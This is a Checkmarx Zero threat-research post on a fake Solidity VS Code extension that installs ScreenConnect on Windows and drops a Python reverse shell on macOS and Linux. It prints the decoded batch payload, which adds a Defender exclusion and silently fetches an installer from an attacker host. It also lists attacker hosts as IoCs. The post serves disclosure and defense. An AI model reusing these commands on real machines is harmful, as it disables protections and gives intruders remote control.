{"id":106616,"date":"2026-01-30T00:01:00","date_gmt":"2026-01-29T22:01:00","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=106616"},"modified":"2026-02-02T11:59:42","modified_gmt":"2026-02-02T09:59:42","slug":"solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","title":{"rendered":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT)"},"content":{"rendered":"<style type=\"text\/css\">\n@import url(\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/styles\/vs2015.min.css\");\n@font-face {\n    font-family: 'Hack';\n    src: url('https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/hack-font\/3.3.0\/web\/fonts\/hack-regular-subset.woff2') format('woff2');\n}\n:root {\n    --code-font: 'Hack','Menlo','Consolas',monospace !important;\n    \/* --code-bg: #282828; *\/\n    --code-bg: rgb(30,30,30);\n    --code-color: #00CC11;\n    --code-dim: #007711;\n    --text-color: rgb(18, 17, 133); \/* use rarely: this matches current text color, but usually just inherit! *\/\n    --highlight-color: #f8ff91;\n    --highlight-color-alt: #736ca0;\n}\narticle.content { max-width: 90% !important; min-width: 80% !important; width: 89% !important; }\n.wp-block-code code { text-wrap: nowrap !important; }\nfigure {\n    margin-top: 1.5rem;\n    margin-bottom: 1.5rem;\n}\np.caption,\nfigcaption { \n    font-size: 1rem !important; \n    font-style: italic !important;\n    \/*background-color: #000;*\/\n    color: var(--code-dim) !important;\n}\np.caption *,\nfigcaption * { \n    font-size: inherit !important; \n}\ndiv.callout {\n    max-width: 80% !important;\n    padding-top: 0.5rem; padding-bottom: 0.5rem;\n    margin-top: 1rem; margin-bottom: 1rem;\n    display: block;\n    margin-left: 10%;\n    border-top: 0.3rem solid rgb(18, 17, 133);\n    border-bottom: 0.3rem solid rgb(18, 17, 133);\n}\ndiv.callout p {\n    font-size: x-large;\n    text-align: left;\n    font-weight: bold;\n}\n.cxzero-video-include { \n    display: block; max-width: 1920px; width: 100%; \n    padding-top: 1rem;\n    padding-bottom: 1rem;\n}\n.cxzero-video-include video {\n    display: block;\n    padding: 0.5rem;\n    background-color: var(--code-bg);\n    width: 98%; \n    object-fit: cover; \n}\npre.wp-block-code,\npre.highlighted-code,\npre.sourceCode,\npre {\n    border: 1px solid var(--code-color);\n    width: 90%;\n    \/*max-width: 90% !important;*\/\n    background-color: var(--code-bg);\n    color: var(--code-color);\n    margin: 1em;\n    padding: 2em;\n    overflow-x: scroll;\n    font-family: var(--code-font);\n    font-size: 10.5pt;\n    line-height: 1.1em;\n    text-wrap: nowrap !important;\n    box-shadow: 5px 5px 13px 0px var(--code-bg);\n}\n* kbd,\n* code,\n* tt {\n    \/*background-color: var(--code-bg);*\/\n    font-family: var(--code-font);\n    padding-inline: 0.5em;\n    color: var(--code-dim); \n    font-size: 85%; \n}\npre code { \n    color: var(--code-color); \n    font-size: 90%;\n}\npre.highlighted-code span {\n    font-family: var(--code-font);\n    font-size: 10.5pt;\n    color: var(--code-color);\n}\npre.highlighted-code span.comment {\n    font-style: italic;\n    color: var(--code-dim);\n}\npre.highlighted-code span.keyword,\npre.highlighted-code span.preproc {\n    font-weight: bold;\n    font-style: oblique;\n}\nblockquote, \nblockquote * { \n    font-size: 1.375rem !important; \n    font-style: italic !important; \n} \nblockquote { \n    border-left: 0.1rem solid; \n    padding-left: 1rem; \n}\n\nmark, mark * {\n    background-color: var(--highlight-color) !important;\n}\n\nmark.ai-content,\nmark.ai-content * {\n    background-color: var(--highlight-color-alt) !important;\n    color: #fff !important;\n}\n\n.cxzero-cve-block { \n    border: 1px solid var(--code-color, #0c1);\n    padding: 0.5rem;\n    p { padding: 0; margin: 0; }\n    span.vulndesc { \n        display: block; \n        font-size: 0.9rem;\n        font-weight: 400;\n        font-style: italic;}\n    span.cvss::before { content: \"  \"; }\n    span.cvss {\n        background: #fe0; \n    }\n    span.cvss.critical { background: #c00; color: #eee; }\n    span.cvss.high { background: #FFAC1C; color: #0015FF; }\n    span.vector::before { content: \"\u25b8\"; }\n    span.vector,\n    span.vector * {\n      font-family: var(--code-font);\n      font-size: 10pt;\n    }\n    .kev {\n        display: block;\n        font-weight: bold;\n    }\n    .kev::before { content: \"\u203c\ufe0f\" }\n}\n\n.print-source-info { display: none; }\n\n@media print {\n    .header, .header *,\n    .article-nav, .article-nav *, .aticle-nav, .aticle-nav *,\n    .section_latest, .section-latest *,\n    footer, footer *,\n    .section-menu-page, .section-menu-page *,\n    .top-menu, .top-menu *,\n    .top-menu__container, .top-menu__container *,\n    .section-zero-article, .section-zero-article *\n    { display: none; }\n\n    @page { margin: 13mm !important; }\n\n    .section-aticle-header__image-or-video { max-width: 125mm; }\n\n    .print-source-info { \n        display: block;\n        border-left: 0.2rem solid #000;\n        font-style: italic !important;\n        font-size: 85%;\n        padding-left: 1rem;\n    }\n\n}\n<\/style>\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/highlight.min.js\" integrity=\"sha512-EBLzUL8XLl+va\/zAsmXwS7Z2B1F9HUHkZwyS\/VKwh3S7T\/U0nF4BaU29EP\/ZSf6zgiIxYAnKLu6bJ8dqpmX5uw==\" crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\"><\/script>\n<script>hljs.highlightAll();<\/script>\n\n\n\n\n<p class=\"print-source-info\"><script>document.write(\"Copyright Checkmarx, all rights reserved. Retrieved \" + new Date().toLocaleDateString() + \" from<br\/>\" + window.location.href)<\/script><noscript>This document copyright Checkmarx, all rights reserved.<\/noscript><\/p>\n\n\n\n<p>\n  Imagine sitting down to start working on a Smart Contract project, installing\n  an IDE extension to support the Solidity language you plan to use, and finding\n  out that some adversary now remotely controls your developer machine. Someone\n  tried to make that nightmare come true; fortunately, Checkmarx Zero got it\n  taken down less than a day after it was published.\n<\/p>\n<p>\n  Unfortunately, this isn\u2019t a new problem. Over the last few years, the\n  Solidity\/VS Code ecosystem has had a recurring issue with look-alike\n  publishers and extensions that impersonate the legitimate Solidity tooling\n  published by Juan Blanco (GitHub:\n  <a href=\"https:\/\/github.com\/juanfranblanco\">juanfranblanco<\/a>). The\n  <em>legitimate<\/em> Solidity\n  <a href=\"https:\/\/github.com\/juanfranblanco\/vscode-solidity\"><u>extension\u2019s own repository<\/u><\/a>\n  even explicitly warns users to watch for impersonations and to check\n  publishing history.\n<\/p>\n<figure>\n  <img decoding=\"async\" src=\"\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda_image1.webp\" alt=\"screenshot of the warning from the official repository on GitHub\">\n  <figcaption aria-hidden=\"true\">\n    screenshot of the warning from the official repository on GitHub\n  <\/figcaption>\n<\/figure>\n<p>\n  We uncovered a new malicious extension published under the publisher\n  juanblan281 (extension <strong>solid281<\/strong>, display name with\n  <strong>zero-width characters<\/strong>: solidit\\u200b\\u200by\\u200b; this would\n  look like \u201csolidity\u201d to human readers). We reported it to the Visual Studio\n  Code Marketplace, who have promptly taken it down. Fortunately, the attacker\n  did not publish it to alternative marketplaces like OpenVSX.\n<\/p>\n<p>\n  The extension is wired to run automatically on startup (onStartupFinished) and\n  immediately executes a heavily obfuscated loader.\n<\/p>\n<p>\n  This is exactly the kind of supply-chain pattern we keep seeing across\n  developer marketplaces (VS Code Marketplace, OpenVSX). Prior public reporting\n  has shown multiple Solidity-targeting extension campaigns using impersonation,\n  obfuscation, and post-install payload delivery. (<a href=\"https:\/\/www.kaspersky.com\/blog\/malicious-extensions-for-cursor-ai\/53802\/\"><u>Example 1<\/u><\/a>,\n  <a href=\"https:\/\/github.com\/eclipse\/openvsx\/issues\/1400\"><u>Example 2<\/u><\/a>)\n<\/p>\n\n\n    <div class=\"section-zero-article light-theme\">\n        <div class=\"section-zero-article__wrapper\">\n            <div class=\"section-zero-article__nav-wrapper\">\n\t\t\t\t<div class=\"section-article-title\">Get Checkmarx Zero in your inbox<\/div>\n                <button class=\"section-article-button\">Subscribe now                    <img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/right_up_big.svg\" alt=\"right\">\n                <\/button>\n            <\/div>\n            <img decoding=\"async\" class=\"visual-image\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/visual-article.png\" alt=\"visual\">\n        <\/div>\n    <\/div>\n\t<!-- zero-subscribe-form-modal -->\n<div class=\"modal zero-subscribe-modal\" id=\"zero-subscribe-modal\">\n    <div class=\"modal__overlay modal__header-overlay\" tabindex=\"-1\">\n        <div class=\"modal__container\">\n            <header class=\"modal__header\" tabindex=\"2\">\n                <button class=\"modal__close-zero\" title=\"Close window\" aria-label=\"Close window\"><\/button>\n                <div class=\"section-subscribe\">\n                    <div class=\"section-subscribe__wrap-form\">\n                        <div class=\"section-subscribe__leftPart\">\n                            <div class=\"zero-modal-container\">\n                                <span class=\"zero-modal-container__title\">Never Miss Checkmarx <br> Zero Research Updates.<\/span>\n                                <span class=\"zero-modal-container__description\">Subscribe today!<\/span>\n                            <\/div>\n                            <img decoding=\"async\" class=\"zero-visual\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/cx_zero_subscribe_visual.webp\" alt=\"visual\">\n                        <\/div>\n                        <div class=\"section-subscribe__form hbsp-form form-with-multi-tags-select\">\n                            <script charset=\"utf-8\" type=\"text\/javascript\" src=\"\/\/js.hsforms.net\/forms\/embed\/v2.js\"><\/script>\n                            <script>\n                                hbspt.forms.create({\n                                    region: \"na1\",\n                                    portalId: \"146169\",\n                                    formId: \"fefb6730-994f-41bf-84ae-79460279a306\",\n                                    onFormReady: function ($form) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'none');\n\n\n                                    },\n                                    onFormSubmit: function ($form) {\n                                        document.querySelector('.zero-visual').style.display = 'none';\n                                        document.querySelector('.section-subscribe__leftPart').style.display = 'none';\n                                        document.querySelector('.form-description').style.display = 'none';\n                                        document.querySelector('.section-subscribe__form').style.margin = 0;\n                                        document.querySelector('.section-subscribe__form').style.padding = 0;\n                                        document.querySelector('.section-subscribe').style.minHeight = '132px';\n                                        document.querySelector('.section-subscribe__wrap-form').style.minHeight = '132px';\n                                        document.querySelector('.subscribe-zero-button__description-wrapper')\n                                            .classList\n                                            .add('subscribe-zero-button__description-hide');\n                                    }\n                                });\n                                document.addEventListener('change', (e) => {\n                                    if (e.target.closest('.hs-input')) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'block');\n                                    }\n\n                                })\n                            <\/script>\n                            <p class=\"form-description\">By submitting my information to Checkmarx, I hereby consent to the terms and conditions found in the <a href=\"\/legal\/privacy-policy\/\" target=\"_blank\">Checkmarx\u00a0Privacy\u00a0Policy<\/a> and to the processing of my personal data as described therein. By clicking submit above, you consent to allow Checkmarx to store and process the personal information submitted above to provide you the content requested.<\/p>\n                        <\/div>\n                    <\/div>\n                <\/div>\n            <\/header>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<h2 id=\"continuous-targeting-of-juan-blancos-solidity-extension\" class=\"article-anchor\">\n  Continuous Targeting of Juan Blanco\u2019s Solidity Extension\n<\/h2>\n<p>\n  The official \u201cSolidity by Juan Blanco\u201d extension has been repeatedly targeted\n  by malicious impersonator extensions on both the VS Code Marketplace and the\n  Open VSX registry. Attackers publish extensions that try to pass as the real\n  one by imitating the name or publisher and reusing the marketplace description\n  and page layout to blend in. To make the listing even more convincing, they\n  often boost download figures so the extension appears popular and safe.\n<\/p>\n<p>\n  One notable case was a fake \u201cSolidity Language Support\u201d extension by a\n  publisher called ShowSnowcrypto, which appeared in VS Code\u2019s Marketplace with\n  nearly 2.9 million installs, even surpassing the real extension\u2019s download\n  count. Around the same time, security researchers identified a malicious\n  impersonation of a \u201cSolidity\u201d extension on Open VSX, published under\n  \u201cjuan-blanco\u201d (with a hyphen) to resemble the legitimate juanblanco publisher.\n  These incidents were widely discussed, highlighting how often malware authors\n  take advantage of the Juan Blanco Solidity extension\u2019s popularity.\n<\/p>\n<h2 id=\"what-it-does\" class=\"article-anchor\">What it Does<\/h2>\n<h3 id=\"windows\">Windows<\/h3>\n<ol type=\"1\">\n  <li>\n    <p>Drops a batch script to `<code>%TEMP%\\\\extension.bat<\/code><\/p>\n  <\/li>\n  <li>\n    <p>\n      Attempts <strong>UAC elevation<\/strong> via\n      <code>PowerShell Start-Process \\... -Verb RunAs<\/code>\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      Adds a <strong>Microsoft Defender exclusion<\/strong> for\n      <strong>Program Files (x86)\/*<\/strong>\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      Silently installs\n      <strong>ScreenConnect \/ ConnectWise Control<\/strong> from attacker\n      infrastructure. These are remote access tools that are being misused by\n      the attacker to gain unauthorized remote access to the developer\n      workstation.\n    <\/p>\n  <\/li>\n<\/ol>\n<h3 id=\"macos-linux\">macOS \/ Linux<\/h3>\n<ol type=\"1\">\n  <li>\n    <p>\n      Drops a Python implant (reverse shell), allowing attackers unauthorized\n      remote access to the developer\u2019s system\n    <\/p>\n  <\/li>\n  <li>\n    <p>**Persists**<\/p>\n    <ul>\n      <li>\n        <p>\n          macOS:\n          <code>LaunchAgent (\\~\/Library\/LaunchAgents\/\\...plist)<\/code> and\n          <code>launchctl load<\/code>\n        <\/p>\n      <\/li>\n      <li>\n        <p>\n          Linux: attempts a user systemd unit\n          (<code>\\~\/.config\/systemd\/user\/testscript.service<\/code>) and\n          <code>systemctl \\--user enable\/start<\/code> (note: the code shows a\n          bug where scriptPath is undefined, so the Linux persistence\n          <em>may fail<\/em> depending on runtime)\n        <\/p>\n      <\/li>\n    <\/ul>\n  <\/li>\n<\/ol>\n<p>\n  This mirrors broader patterns reported by other teams: Solidity developers\n  appear to be targeted specifically, including campaigns that used fake\n  Solidity extensions to install ScreenConnect and then deploy follow-on\n  payloads.\n<\/p>\n<h2 id=\"technical-breakdown-how-attackers-gain-remote-access-to-developer-machines\" class=\"article-anchor\">\n  Technical breakdown: how attackers gain remote access to developer machines\n<\/h2>\n<h3 id=\"windows-chain-uac-prompt-defender-exclusion-silent-screenconnect-install\">\n  1) Windows chain: UAC prompt \u2192 Defender exclusion \u2192 silent ScreenConnect\n  install\n<\/h3>\n<p>The decoded Windows payload is the clearest \u201cintent\u201d signal:<\/p>\n<div class=\"sourceCode\" id=\"cb1\">\n  <pre class=\"sourceCode bat\"><code class=\"sourceCode dosbat\"><span id=\"cb1-1\"><a href=\"#cb1-1\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"kw\">@<\/span><span class=\"bu\">echo off<\/span><\/span>\n<span id=\"cb1-2\"><a href=\"#cb1-2\" aria-hidden=\"true\" tabindex=\"-1\"><\/a>powershell.exe <span class=\"at\">-WindowStyle<\/span> Hidden <span class=\"at\">-NoProfile<\/span> <span class=\"at\">-Command<\/span> <span class=\"st\">&quot;Add-MpPreference -ExclusionPath ([Environment]::GetFolderPath(&#39;ProgramFilesX86&#39;))&quot;<\/span><\/span>\n<span id=\"cb1-3\"><a href=\"#cb1-3\" aria-hidden=\"true\" tabindex=\"-1\"><\/a>msiexec.exe <span class=\"at\">\/i<\/span> <span class=\"st\">&quot;http:\/\/meow[.]undefined21[.]com:8040\/Bin\/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest&quot;<\/span> <span class=\"at\">\/qn<\/span> <span class=\"at\">\/norestart<\/span><\/span>\n<span id=\"cb1-4\"><a href=\"#cb1-4\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"bu\">del<\/span> <span class=\"st\">&quot;<\/span><span class=\"pp\">%~f<\/span><span class=\"va\">0<\/span><span class=\"st\">&quot;<\/span><\/span><\/code><\/pre>\n<\/div>\n<p>(Note: safety adjustments made)<\/p>\n<h4 id=\"why-this-matters\">Why this matters<\/h4>\n<ul>\n  <li>\n    <p>\n      <code>Add-MpPreference -ExclusionPath &lt;dir&gt;<\/code>: Defender\n      explicitly documents that this disables scheduled + real-time scanning for\n      that directory.\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      <code>msiexec \/qn<\/code>: fully silent install (no UI), classic for\n      unattended deployment by malware. The URL provided as an argument\n      downloads the ScreenConnect remote-access tool for installation (we added\n      brackets to avoid accidents)\n    <\/p>\n  <\/li>\n<\/ul>\n<p>\n  The loader also checks for an existing\n  <strong>\u201cScreenConnect Client\u201d<\/strong> directory under Program Files (x86)\n  and exits if found (suggesting the actor expects repeated runs \/ reinfection\n  attempts).\n<\/p>\n<h3 id=\"macos-persistence-launchagent-hidden-dropped-script\">\n  2) macOS persistence: LaunchAgent + hidden dropped script\n<\/h3>\n<p>\n  The macOS branch writes the reverse shell Python file and then creates a\n  LaunchAgent plist with <code>RunAtLoad<\/code>, loading it via\n  <code>launchctl<\/code>. (common persistence mechanism on macOS.)\n<\/p>\n<h3 id=\"linux-persistence-attempt-systemd-user-service\">\n  3) Linux persistence attempt: systemd user service\n<\/h3>\n<p>\n  The Linux branch tries to create a user unit at:\n  <code>~\/.config\/systemd\/user\/testscript.service<\/code> then runs:\n<\/p>\n<div class=\"sourceCode\" id=\"cb2\">\n  <pre class=\"sourceCode sh\"><code class=\"sourceCode bash\"><span id=\"cb2-1\"><a href=\"#cb2-1\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"ex\">systemctl<\/span> <span class=\"at\">--user<\/span> enable testscript.service<\/span>\n<span id=\"cb2-2\"><a href=\"#cb2-2\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"ex\">systemctl<\/span> <span class=\"at\">--user<\/span> start testscript.service<\/span><\/code><\/pre>\n<\/div>\n<p>\n  However, scriptPath is undefined in the unit template, so the Linux\n  persistence may not work as intended in this exact build.\n<\/p>\n<h3 id=\"python-implant-reverse-shell-over-xor-encryption\">\n  4) Python implant: reverse shell over XOR \u201cencryption\u201d\n<\/h3>\n<p>The python payload is a classic interactive reverse shell:<\/p>\n<ul>\n  <li>\n    <p>connects to <code>c[.]undefined21[.]com:4444<\/code><\/p>\n  <\/li>\n  <li>\n    <p>sends a victim identifier <code>__NAME__:user@host<\/code><\/p>\n  <\/li>\n  <li>\n    <p>spawns <code>\/bin\/bash<\/code> under a PTY<\/p>\n  <\/li>\n  <li><p>multiplexes socket \u2194\ufe0e PTY I\/O<\/p><\/li>\n  <li>\n    <p>supports <code>__PING__ \/ __PONG__<\/code><\/p>\n  <\/li>\n<\/ul>\n<h2 id=\"this-is-part-of-a-larger-adversarial-pattern-context\" class=\"article-anchor\">\n  This is part of a larger adversarial pattern (context)\n<\/h2>\n<p>This incident is not happening in a vacuum:<\/p>\n<ul>\n  <li>\n    <p>\n      <strong>OpenVSX has had repeated \u201cJuan Blanco look-alike\u201d reports<\/strong>, including an OpenVSX issue opened by the legitimate author pointing to\n      a fake <strong>juanbIanco<\/strong> publisher (uppercase \u201cI\u201d\n      impersonation).\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      <strong>Solidity developers are a known target set<\/strong> for malicious\n      VS Code extensions. Datadog\u2019s Security Labs documented a campaign\n      (MUT-9332) using impersonation and obfuscation to deliver malicious\n      behavior to Solidity developers.\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      <strong>ScreenConnect as a follow-on payload<\/strong> in fake Solidity\n      extensions has been reported publicly (OpenVSX ecosystem), including cases\n      where ScreenConnect was used to deliver additional tooling and steal\n      crypto assets.\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      The broader \u201cmalicious extension marketplace\u201d problem keeps repeating\n      across multiple stores and publisher accounts.\n    <\/p>\n  <\/li>\n<\/ul>\n<h2 id=\"section\" class=\"article-anchor\"><\/h2>\n<h2 id=\"a-calling-card-in-the-source-ascii-art-a-pointed-message\" class=\"article-anchor\">\n  A \u201ccalling card\u201d in the source: ASCII art + a pointed message\n<\/h2>\n<p>\n  Before the obfuscated loader starts, the attacker left a header comment in\n  <code>webpack.js<\/code> that looks like a signature: a block of Unicode \u201cASCII\n  art\u201d followed by a short note clearly written for humans reviewing the sample.\n<\/p>\n<p>\n  We can see a clear taunting at the devs of the\n  <a href=\"https:\/\/thehackernews.com\/2025\/12\/glassworm-returns-with-24-malicious.html\">recent GlassWorm campaign<\/a>\n  by the emoji choice. The \ud83e\udd5b\ud83e\udeb1 \u201cglass worm\u201d combination is hard to ignore given\n  recent public reporting around \u201cworm-like\u201d VS Code\/OpenVSX marketplace malware\n  and invisible\/unicode tricks like the GlassWorm campaign the threat actors are\n  mentioning.\n<\/p>\n<figure>\n  <img decoding=\"async\" src=\"\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda_image2.webp\" alt=\"screenshot of \u201ccalling card\u201d in webpack.js\">\n  <figcaption aria-hidden=\"true\">\n    screenshot of \u201ccalling card\u201d in webpack.js\n  <\/figcaption>\n<\/figure>\n<h2 id=\"mitigation-checklist\" class=\"article-anchor\">Mitigation Checklist<\/h2>\n<p>\n  If you suspect this extension was installed,\n  <mark>treat the host as compromised:<\/mark>\n  <strong>isolate it, remove the extension, and hunt for persistence + IoCs before\n    returning it to normal use.<\/strong>\n<\/p>\n<ol type=\"1\">\n  <li><p>Remove the extension from affected machines.<\/p><\/li>\n  <li>\n    <p>Windows:<\/p>\n    <ul>\n      <li>\n        <p>\n          Check installed programs\/services for ScreenConnect \/ ConnectWise\n          Control.\n        <\/p>\n      <\/li>\n      <li>\n        <p>\n          Review Defender exclusions for unexpected entries (especially\n          <code>Program Files (x86)<\/code>).\n        <\/p>\n      <\/li>\n    <\/ul>\n  <\/li>\n  <li>\n    <p>macOS:<\/p>\n    <ul>\n      <li>\n        Inspect `~\/Library\/LaunchAgents\/&#8220; for the listed plist and any recent\n        additions.\n      <\/li>\n    <\/ul>\n  <\/li>\n  <li>\n    <p>Linux:<\/p>\n    <ul>\n      <li>\n        Inspect <code>~\/.config\/systemd\/user\/<\/code> and\n        <code>systemctl --user list-units<\/code> for suspicious services.\n      <\/li>\n    <\/ul>\n  <\/li>\n<\/ol>\n<h2 id=\"indicators-of-compromise\" class=\"article-anchor\">Indicators of Compromise<\/h2>\n<h3 id=\"network\">Network<\/h3>\n<p>Outgoing connections to any of the following resources:<\/p>\n<pre class=\"text\"><code>meow[.]undefined21[.]com:8040\nc[.]undefined21[.]com:4444\nhttp[:]\/\/meow[.]undefined21[.]com:8040\/Bin\/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest<\/code><\/pre>\n<h3 id=\"dropped-files-persistence\">Dropped files \/ persistence<\/h3>\n<p>Files matching the following naming schemes:<\/p>\n<pre class=\"text\"><code>%TEMP%\\extension.bat\n\/tmp\/.test.py\n~\/Library\/LaunchAgents\/com.example.testscript.plist\n~\/.config\/systemd\/user\/testscript.service<\/code><\/pre>\n<h3 id=\"virustotal-scan-screenconnect-exe\">\n  VirusTotal Scan (ScreenConnect exe)\n<\/h3>\n<p>\n  <a href=\"https:\/\/www.virustotal.com\/gui\/file\/27839e28629d80a917e2f0b0cbc2c1d87a3b2ab7b620d133672712b801104236?nocache=1\">VirusTotal page for the ScreenConnect.ClientSetup.msi installer<\/a>\n<\/p>\n<p>\n  File hash:\n  <code>27839e28629d80a917e2f0b0cbc2c1d87a3b2ab7b620d133672712b801104236<\/code>\n<\/p>\n<p>\n  Note: ScreenConnect is legitimate software often used for remote machine\n  management; however, it is also frequently used as a Remote Access Trojan\n  (RAT) by various adversaries. If your organization has not adopted it for\n  legitimate purposes, you should treat its presence as an indicator of\n  compromise.\n<\/p>\n<h2 id=\"timeline\" class=\"article-anchor\">Timeline<\/h2>\n<ul>\n  <li>\n    <p>\n      <strong>2026-01-08 21:08:41 UTC<\/strong> \u2014 Extension published \/ release\n      date (<code>juanblan281.solid281<\/code>).\n    <\/p>\n  <\/li>\n  <li>\n    <p><strong>2026-01-09 00:45:38 UTC<\/strong> \u2014 Last updated.<\/p>\n  <\/li>\n  <li>\n    <p><strong>2026-01-09 12:37 UTC<\/strong> \u2014 Reported to the Marketplace.<\/p>\n  <\/li>\n  <li>\n    <p>\n      <strong>2026-01-09 15:47 UTC<\/strong> \u2014 Marketplace confirmed takedown;\n      listing is no longer accessible.\n    <\/p>\n  <\/li>\n<\/ul>\n\n\n    <button class=\"subscribe-button\">\n\t\tSubscribe for updates        <img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/right_up_big.svg\" alt=\"right\">\n    <\/button>\n\t<!-- zero-subscribe-form-modal -->\n<div class=\"modal zero-subscribe-modal\" id=\"zero-subscribe-modal\">\n    <div class=\"modal__overlay modal__header-overlay\" tabindex=\"-1\">\n        <div class=\"modal__container\">\n            <header class=\"modal__header\" tabindex=\"2\">\n                <button class=\"modal__close-zero\" title=\"Close window\" aria-label=\"Close window\"><\/button>\n                <div class=\"section-subscribe\">\n                    <div class=\"section-subscribe__wrap-form\">\n                        <div class=\"section-subscribe__leftPart\">\n                            <div class=\"zero-modal-container\">\n                                <span class=\"zero-modal-container__title\">Never Miss Checkmarx <br> Zero Research Updates.<\/span>\n                                <span class=\"zero-modal-container__description\">Subscribe today!<\/span>\n                            <\/div>\n                            <img decoding=\"async\" class=\"zero-visual\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/cx_zero_subscribe_visual.webp\" alt=\"visual\">\n                        <\/div>\n                        <div class=\"section-subscribe__form hbsp-form form-with-multi-tags-select\">\n                            <script charset=\"utf-8\" type=\"text\/javascript\" src=\"\/\/js.hsforms.net\/forms\/embed\/v2.js\"><\/script>\n                            <script>\n                                hbspt.forms.create({\n                                    region: \"na1\",\n                                    portalId: \"146169\",\n                                    formId: \"fefb6730-994f-41bf-84ae-79460279a306\",\n                                    onFormReady: function ($form) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'none');\n\n\n                                    },\n                                    onFormSubmit: function ($form) {\n                                        document.querySelector('.zero-visual').style.display = 'none';\n                                        document.querySelector('.section-subscribe__leftPart').style.display = 'none';\n                                        document.querySelector('.form-description').style.display = 'none';\n                                        document.querySelector('.section-subscribe__form').style.margin = 0;\n                                        document.querySelector('.section-subscribe__form').style.padding = 0;\n                                        document.querySelector('.section-subscribe').style.minHeight = '132px';\n                                        document.querySelector('.section-subscribe__wrap-form').style.minHeight = '132px';\n                                        document.querySelector('.subscribe-zero-button__description-wrapper')\n                                            .classList\n                                            .add('subscribe-zero-button__description-hide');\n                                    }\n                                });\n                                document.addEventListener('change', (e) => {\n                                    if (e.target.closest('.hs-input')) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'block');\n                                    }\n\n                                })\n                            <\/script>\n                            <p class=\"form-description\">By submitting my information to Checkmarx, I hereby consent to the terms and conditions found in the <a href=\"\/legal\/privacy-policy\/\" target=\"_blank\">Checkmarx\u00a0Privacy\u00a0Policy<\/a> and to the processing of my personal data as described therein. By clicking submit above, you consent to allow Checkmarx to store and process the personal information submitted above to provide you the content requested.<\/p>\n                        <\/div>\n                    <\/div>\n                <\/div>\n            <\/header>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<style type=\"text\/css\">.cxzero-social{margin-top:1em;padding-top:1em;border-top:1px solid #121086;border-bottom:1px solid #121086;padding-bottom:1em}.cxzero-social p{padding-top:.8em}.cxzero-social .cxzero-social-links{margin-left:.8em}.cxzero-social .social-link{margin-left:.6em}.cxzero-social .social-button{padding:.6em;margin:.2em .2em .2em .2em;white-space:nowrap}.cxzero-social .social-button svg,.cxzero-social .social-link svg{vertical-align:middle;height:1.3em}.cxzero-social .social-button a,.cxzero-social .social-link a{text-decoration:none !important}<\/style> <div class=\"cxzero-social\">\n<p> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/www.linkedin.com\/sharing\/share-offsite\/?url={url}\" onload=\"\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"LinkedIn Icon\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" 